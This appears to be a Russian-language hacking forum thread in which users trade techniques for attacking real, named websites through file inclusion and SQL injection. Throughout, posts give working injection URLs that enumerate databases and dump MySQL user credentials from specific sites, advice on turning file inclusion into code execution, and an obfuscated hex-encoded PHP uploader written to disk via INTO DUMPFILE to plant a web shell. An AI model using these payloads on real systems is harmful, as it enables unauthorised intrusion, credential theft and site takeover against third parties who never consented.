Извини меня но если человеку слово инклуд ни о чём не говорит то острактное "прочитать" даст большее понимание чем проинклудить которое более непонятно чем само слово инклуд. Расширяйте кругозор: Читать Воспринимать какую-н. письменную речь по ее внешним знакам, буквам и т. п. (произнося вслух или про себя, молча).Ч. буквы. Ч. слова. Ч. по…
Если ты не можешь дать полноценный ответ, то лучше промолчи. Ответить на вопрос, сказав что при локальном инклуде можно проинклудить пхп файл выполнив в нём код, который зальёт шелл (или сам код шелла) или прочитать файл не содержащий пхп кода (/etc/passwd, .htpasswd и т.д.) и дать линк на статью на тему инклуда не так сложно. Ещё, как совет можно сказать, что можно пытаться проинклудить: 1. Логи апача. 2. Файл сессии. 3. Залитый через форум (или какой нидь двиг) картинку с пхп кодом.
Вообщета я по пыху проф а не по уязвимостям, знал бы не спросил! Учусь быстро! Там инклуд точно а значит к примеру с сайта http://site.ru/shell.php подставить к http://wow.alania.net/?page=! И получится http://wow.alania.net/?page=http://site.ru/shell.php Я прав??? И обьясните плиз почему это не инъекция??? http://wow.alania.net/?page=guilds&id=-7'
geforce LFI (Local File Include) Можно как выражается грэй инклудить только локальные фаилы (находящиеся на сервере wow.alania.net) Попробуй выполнить команду http://wow.alania.net/?page=guilds&id=7+and+1=1+--+ http://wow.alania.net/?page=guilds&id=7+and+1=2+--+
Друг ты помоему обкурился Вообщет надо сначало поля вывода подобрать путем order или методом перебора union+select+1,2,3,4,5,......./**/
geforce Подбирай , как подберёш отпишись. И прочитай хотябы фак. http://forum.antichat.ru/thread19844.html OffTop Круто статусное сообщение влияет на отношение к людям)) Хочу -10000 поможете?? Grey: Эт не оскорбление это у меня в статусе написано...или меня ачат оскарбляет? 0_0
2 geforce 1. Он уже ответил тебе, что скули в том параметре нет. 2. У тебя очень низкие познания в синтаксисе sql, прочти статью линк на которую он тебе дал (а ещё заодно статью от Dr.Z3r0). 3. Очень советую прочитать статью про инклуд. Вообщем то инклуд достаточно серьезная уязвимость и повозиться с ним более чем разумно. 4. Не надо ни кого оскорблять. 2 Rev Фразы "Друг ты помоему обкурился" и "Ламер" - это всё таки оффтоп и оскорбления.
geforce дрЗиро ---- >http://forum.antichat.ru/thread43966.html Не ну я так и не понял -10000 у меня в репе случится??
http://www.witchvox.com/vn/vn_detail/dt_wn.html?a=usak&id=19242 я понял что тут скуль иньекция возможна но при подборе колонок (union+select) я почему то их немогу подобрать(дошол до 30 но не увидел ничего) в чем дело?
http://www.witchvox.com/vn/vn_detail/dt_wn.html?a=usak&id=19242+and+ascii(substring((select+concat_ws(0x2F,table_name,table_schema,column_name)+from+information_schema.columns+where+column_name+like+0x257061737325+limit+0,1),1,1))>1--+
Там рядом с выводом скуля: http://www.witchvox.com/va/dt_va.html?a=usfl&c=notes&id=10154)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,user,password,host,file_priv),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112+from+mysql.user--+ -------------------------------------------------- К топу ниже: http://www.placementindia.com/job-search/view_res.php?code=546588&res_ty=ml'+union+select+1,concat_ws(0x3a,'%3Ch1%3E',user(),version(),database(),'%3C/h1%3E')+--+
http://www.placementindia.com/job-search/pi_fl_srch.php?offset=-1 Кто рассковыряет, тому будет всякое счастье Я не смог.
Не у себя попробывал файл check.php создался в нём текст <? include("http://127.0.0.1/shell.txt") ?> захожу на сайт шелл выплёвывает это Warning: include() [function.include]: URL file-access is disabled in the server configuration in C:\Program Files\VertrigoServ\www\check.php on line 1 Warning: include(http://127.0.0.1/shell.txt) [function.include]: failed to open stream: no suitable wrapper could be found in C:\Program Files\VertrigoServ\www\check.php on line 1 Warning: include() [function.include]: Failed opening 'http://127.0.0.1/shell.txt' for inclusion (include_path='.;C:\Program Files\VertrigoServ\Smarty') in C:\Program Files\VertrigoServ\www\check.php on line 1
загрузи какой нибудь мини аплоудер, например(пробелы поуберай): PHP: select 0x3c3f706870206576616c28677a696e666c617465286261736536345f6465636f646528276a5a505062707441454d62766c76774f6f35556c45696b4f6971746547724261705553706c4e535737665a6957516a44576944787237445974616f2b583376724a512b416b6c433769634532394e4244716e515854427858506654437a734c332f575a326471693543744642684a72636c5472767055366665393036655863687665334a6e5661727877324f7135556130386a456b5833564d3179796f32366674576c38666c6f4941396430416731375643494977706e556b616f565153655732575172566a5332586b69395636415434746278683841596979654f5462424e36723270693045744e6949692b4350686d6655595646337866457a665451786263795a2b2f616a782f41677846444749695a76774a6278655a62506245483647502b36534b3468445745657271326746416c3949714a597638773864625a72583032674b77795a634a71744643446433447a41724d504d53492f44444a7255316d486a6b6542596f4b6a45635730522f4e51534268596e7561434a79485a2f75734b3053656859525759464a44466678434d2f73645530684369763757356265773232654a647657477445736875304742416f7a617741435737466f624f4f4a7a4849694743746d674e6b4e7343327433364f38723475484842622b50347846577867713775335131563230596536345234614a537a654c632f652f68483477744179794159766f6d584c74546d667a394434645073727a5675524265512f385a6b4459754a5244704767736a77677661334b3731653331756249443341414f41664749506e652b735a4c79475452477347633559797758474b7a4a6a4c5248786164767a7156756e79735077413336484c48636a664d416e75546433363957506c5572574e5564514a6530733543746c3947764f436c47354873557877655178484354724e4e7347635777544f42336d697779574762702f41557237676b4e614657664b6333304d5779356a2f384b2b77702f41413d3d272929293b203f3e INTO DUMPFILE 'C:/Program Files/VertrigoServ/www/engine/inc/uplouder.php' ну а уже с помошью него загрузи шелл.
Там и не раскрутишь, тк инъекция в limit'е. Ищи другие инъекции, к примеру вот: http://www.placementindia.com/job-recruiters/vac_hdetl.php?slno=238629'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29+--+ Вывод присутствует.
Кто сможет подсказать. При помощи information_schema.schemata узнал имена используемых баз, а как узнать имена таблиц в конкретной базе? Ведь как я понимаю по information_schema.tables выводятся имена таблиц во всех базах, а не в какой-то конкретной? Так ли, или я чего-то путаю?
приятного времени суток.... Возник вопрос. Смотрел статью : https://forum.antichat.ru/showpost.php?p=1047515&postcount=79 и не хрена не понял )))) сайт : http://www.intes-online.de/cms/index.php?id=1 Order/group by 1 подскажите , это уже не в 1 раз Ps: спс за время
Saiga Там дальше комментарии. Писал я это для того, что-бы показать , что вывод ВОЗМОЖЕН, но не везде разумеется. Тоесть никто не говорил, что при двойных запросах 100% будет вывод
